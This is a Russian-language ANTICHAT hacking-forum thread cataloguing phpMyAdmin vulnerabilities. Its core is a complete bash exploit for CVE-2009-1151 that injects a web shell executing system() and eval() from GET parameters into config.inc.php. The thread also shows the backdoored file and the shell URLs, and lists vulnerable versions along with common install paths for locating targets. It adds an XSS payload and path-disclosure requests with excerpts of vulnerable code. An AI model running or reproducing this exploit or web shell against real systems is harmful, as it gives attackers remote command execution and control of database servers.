ANTICHAT - [ Обзор уязвимостей phpMyAdmin ]

ANTICHAT (https://forum.antichat.xyz/index.php)

- Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - [ Обзор уязвимостей phpMyAdmin ] (https://forum.antichat.xyz/showthread.php?t=50669)

Код:

calendar.php?GLOBALS

иожно узнать точную версию, если > 3.*

phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit

Код:

#!/bin/bash



# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11

# by pagvac (gnucitizen.org), 4th June 2009.

# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln, 

# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!



# PoC script successfully tested on the following targets:

# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1

# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)



# attack requirements:

# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5

# and 3.x before 3.1.3.1 according to PMASA-2009-3

# 2) it *seems* this vuln can only be exploited against environments

# where the administrator has chosen to install phpMyAdmin following

# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx

# 3) administrator must have NOT deleted the '/config/' directory

# within the '/phpMyAdmin/' directory. this is because this directory is

# where '/scripts/setup.php' tries to create 'config.inc.php' which is where

# our evil PHP code is injected 8)



# more info on:

# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php

# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/



if [[ $# -ne 1 ]]

then

        echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"

        echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"

        exit

fi



if ! which curl >/dev/null

then

        echo "sorry but you need curl for this script to work!"

               echo "on Debian/Ubuntu: sudo apt-get install curl"

               exit

fi





function exploit {



postdata="token=$1&action=save&configuration="\

"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\

"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\

"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\

"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\

"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"



postdata2="token=$1&action=save&configuration=a:1:"\

"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\

"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\

"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\

"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\

"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\

"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\

"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\

"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\

"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"



        flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"

        

        echo "[+] attempting to inject phpinfo() ..."

        curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null



        if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null

        then

                curl -ks --url "$3/config/config.inc.php" >$flag        

                echo "[+] success! phpinfo() injected successfully! output saved on $flag"

                curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null

                echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"

                echo "    $3/config/config.inc.php?c=ls+-l+/"

                echo "    $3/config/config.inc.php?p=phpinfo();"

                echo "    please send any feedback/improvements for this script to"\

                "unknown.pentester<AT_sign__here>gmail.com"

        else

                echo "[+] no luck injecting to $3/config/config.inc.php :("

                exit

        fi

}

# end of exploit function



cookiejar="/tmp/$(basename $0).$RANDOM.txt"

token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`

echo "[+] checking if phpMyAdmin exists on URL provided ..."



#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null

if grep phpMyAdmin $cookiejar &>/dev/null

then

        length=`echo -n $token | wc -c`



        # valid form token obtained?

        if [[ $length -eq 32 ]]

        then

                echo "[+] phpMyAdmin cookie and form token received successfully. Good!"

                # attempt exploit!

                exploit $token $cookiejar $1

        else

                echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("

                exit

        fi

else

        echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"

        exit

fi



# milw0rm.com [2009-06-09]

CVE-2009-1151 (phpmyadminrcesh.txt) PMASA-2009-3 PMASA-2009-4

Код:

<?php

/*

 * Generated configuration file

 * Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <michal@cihar.com>

 * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $

 * Date: Tue, 09 Jun 2009 14:13:34 GMT

 */



/* Servers configuration */

$i = 0;



/* Server  (config:root) [1] */

$i++;

$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo

'<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo

'<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';

$cfg['Servers'][$i]['extension'] = 'mysqli';

$cfg['Servers'][$i]['connect_type'] = 'tcp';

$cfg['Servers'][$i]['compress'] = false;

$cfg['Servers'][$i]['auth_type'] = 'config';

$cfg['Servers'][$i]['user'] = 'root';



/* End of servers configuration */



?>

phpMyAdmin//config/config.inc.php?c=ls+-l+/
phpMyAdmin//config/config.inc.php?p=phpinfo();

Vulnerable software and versions:
phpmyadmin:3.1.3
phpmyadmin:3.1.3:rc1
phpmyadmin:3.1.2
phpmyadmin:3.1.2:rc1
phpmyadmin:3.1.1
phpmyadmin:3.1.1:rc1
phpmyadmin:3.1.0
phpmyadmin:2.11.9.3
phpmyadmin:2.11.9.4
phpmyadmin:2.11.9.2
phpmyadmin:2.11.9.1
phpmyadmin:2.11.9.0
phpmyadmin:2.11.9
phpmyadmin:2.11.8
phpmyadmin:2.11.7.12.11.7.1
phpmyadmin:2.11.7.0
phpmyadmin:2.11.7
phpmyadmin:2.11.6:rc1
phpmyadmin:2.11.6.0
phpmyadmin:2.11.6
phpmyadmin:2.11.5:rc1
phpmyadmin:2.11.5.2
phpmyadmin:2.11.5.1
phpmyadmin:2.11.5.0
phpmyadmin:2.11.5
phpmyadmin:2.11.4:rc1
phpmyadmin:2.11.4
phpmyadmin:2.11.3:rc1
phpmyadmin:2.11.3.0
phpmyadmin:2.11.3
phpmyadmin:2.11.2.2
phpmyadmin:2.11.2.1
phpmyadmin:2.11.2.0
phpmyadmin:2.11.2
phpmyadmin:2.11.1:rc1
phpmyadmin:2.11.1.2
phpmyadmin:2.11.1.1
phpmyadmin:2.11.1.0
phpmyadmin:2.11.1
phpmyadmin:2.11.0:rc1
phpmyadmin:2.11.0:beta1
phpmyadmin:2.11.0

По поводу full path disclosure
В последних версиях в корне пма есть файл phpinfo.php с соответствующем контентом и как правило админы его не удаляют

Files locations

Код:

/php-my-admin/

/phpMyAdmin-2.5.5-rc1/

/phpMyAdmin-2.5.5-rc2/

/phpMyAdmin-2.5.5-pl1/

/phpMyAdmin-2.5.6-rc1/

/phpMyAdmin-2.5.6-rc2/

/phpMyAdmin-2.5.7-pl1/

/phpMyAdmin-2.6.0-alpha/

/phpMyAdmin-2.6.0-alpha2/

/phpMyAdmin-2.6.0-beta1/

/phpMyAdmin-2.6.0-beta2/

/phpMyAdmin-2.6.0-rc1/

/phpMyAdmin-2.6.0-rc2/

/phpMyAdmin-2.6.0-rc3/

/phpMyAdmin-2.6.0-pl2/

/phpMyAdmin-2.6.0-pl3/

/phpMyAdmin-2.6.1-rc1/

/phpMyAdmin-2.6.1-rc2/

/phpMyAdmin-2.6.1/

/phpMyAdmin-2.6.1-pl1/

/phpMyAdmin-2.6.1-pl2/

/phpMyAdmin-2.6.1-pl3/

/phpMyAdmin-2.6.2-beta1/

/phpMyAdmin-2.6.2-pl1/

/phpMyAdmin-2.6.4-rc1/

/phpMyAdmin-2.6.4-pl1/

/phpMyAdmin-2.6.4-pl2/

/phpMyAdmin-2.6.4-pl3/

/phpMyAdmin-2.6.4-pl4/

/phpMyAdmin-2.7.0-beta1/

/phpMyAdmin-2.7.0-rc1/

/phpMyAdmin-2.7.0-pl1/

/phpMyAdmin-2.7.0-pl2/

/phpMyAdmin-2.8.0-beta1/

/phpMyAdmin-2.8.0-rc1/

/phpMyAdmin-2.8.0-rc2/

/phpMyAdmin-2.8.0/

/phpMyAdmin-2.8.0.1/

/phpMyAdmin-2.8.0.2/

/phpMyAdmin-2.8.0.3/

/phpMyAdmin-2.8.0.4/

/phpMyAdmin-2.8.1-rc1/

/sqlmanager/

/mysqlmanager/

/p/m/a/

/PMA2005/

/pma2005/

/phpmanager/

/php-myadmin/

/phpmy-admin/

/webadmin/

/sqlweb/

/websql/

/webdb/

По поводу уязвимости phpMyAdmin (/scripts/setup.php) PHP Code Injection добавлю что phpMyAdmin 2.8.x также уязвима.
Проверял на phpMyAdmin 2.8.0.3 Главное чтобы права на запись были (

Цитата:

Сообщение от Spyder

libraries/config.default.php

PHP код:


		
			
$cfg['ShowPhpInfo'] = false;

Все зависит от настроек. по дефолту выключено.

phpMyAdmin SQL bookmark HTML Injection Vulnerability

Код:

Bugtraq ID:         35543 

Class:         Input Validation Error 

CVE:                 CVE-2009-2284

Remote:         Yes 

Local:         No 

Published:         Jun 30 2009 12:00AM 

Updated:         Aug 21 2009 03:57PM 

Credit:         Sven Vetsch 

Vulnerable:         RedHat Fedora 9 0

                RedHat Fedora 11

                RedHat Fedora 10

                phpMyAdmin phpMyAdmin 3.1.1 1

                phpMyAdmin phpMyAdmin 3.1.1 0

                phpMyAdmin phpMyAdmin 3.1 0

                phpMyAdmin phpMyAdmin 3.0.1 

                phpMyAdmin phpMyAdmin 3.0 

                phpMyAdmin phpMyAdmin 3.2.0-rc1

                phpMyAdmin phpMyAdmin 3.1.3.2

                phpMyAdmin phpMyAdmin 3.1.3.1

                phpMyAdmin phpMyAdmin 3.0.1.1

                MandrakeSoft Enterprise Server 5 x86_64

                MandrakeSoft Enterprise Server 5

Эксплойта или более конкретного описания в инете не нашел. Покопался сам:

Код:

/sql.php?db=test&token=849967e893f3ea2c0205f71270269616&sql_query=SELECT+%3Cscript%3Ealert()%3C/script%3E

как узнать точную версию phpMyAdmin

Раскрытие путей
phpMyAdmin 2.6.1

Код:

http://localhost/Tools/phpMyAdmin/server_variables.php?lang=ru-win1251&server=1&collation_connection='

Код:

Fatal error: Call to undefined function PMA_reloadNavigation() in Z:\home\l

calhost\www\Tools\phpmyadmin\header.inc.php on line 132

Уязвимая часть :

PHP код:


		
			
 function PMA_reloadNavigation() { 

        global $cfg; 



        // Reloads the navigation frame via JavaScript if required 

        if (isset($GLOBALS['reload']) && $GLOBALS['reload']) { 

            echo "\n"; 

            $reload_url = './left.php?' . PMA_generate_common_url((isset($GLOBALS['db']) ? $GLOBALS['db'] : ''), '', '&'); 

            ?> 

<script type="text/javascript" language="javascript1.2"> 

<!-- 

if (typeof(window.parent) != 'undefined' 

    && typeof(window.parent.frames['nav']) != 'undefined') { 

    window.parent.frames['nav'].goTo('<?php echo $reload_url; ?>&hash=' + <?php echo (($cfg['QueryFrame'] && $cfg['QueryFrameJS']) ? 'window.parent.frames[\'queryframe\'].document.hashform.hash.value' : "'" . md5($cfg['PmaAbsoluteUri']) . "'"); ?>); 

} 

//--> 

</script> 

            <?php 

            unset($GLOBALS['reload']); 

        } 

    }

UPD

Код:

http://localhost/Tools/phpMyAdmin/footer.inc.php

Код:

Notice: Undefined variable: cfg in Z:\home\localhost\www\Tools\phpmyadmin\footer.inc.php on line 17

Уязвимый код:

PHP код:


		
			
<?php

/* $Id$ */

// vim: expandtab sw=4 ts=4 sts=4:



/**

 * WARNING: This script has to be included at the very end of your code because

 *          it will stop the script execution!

 */



require_once('./libraries/relation.lib.php'); // for PMA_setHistory()



/**

 * Query window

 */



// If query window is wanted and open, update with latest selected db/table.

if ($cfg['QueryFrame'] && $cfg['QueryFrameJS']) {

?>

Код:

http://localhost/Tools/phpMyAdmin/mult_submits.inc.php

Код:

Fatal error: Call to undefined function PMA_DBI_select_db() in Z:\home\localhost\www\Tools\phpmyadmin\mult_submits.inc.php on line 385

Уязвимый код:

PHP код:


		
			
if ($run_parts) { 

            $sql_query .= $a_query . ';' . "\n";

            if ($query_type != 'drop_db') {

                PMA_DBI_select_db($db);

            }

            $result = @PMA_DBI_query($a_query) or PMA_mysqlDie('', $a_query, FALSE, $err_url);

        } // end if

    } // end for



    if ($use_sql) {

        require('./sql.php');

    } elseif (!$run_parts) {

        PMA_DBI_select_db($db);

        $result = PMA_DBI_query($sql_query);

    }



}



?>

(C)Xcontrol212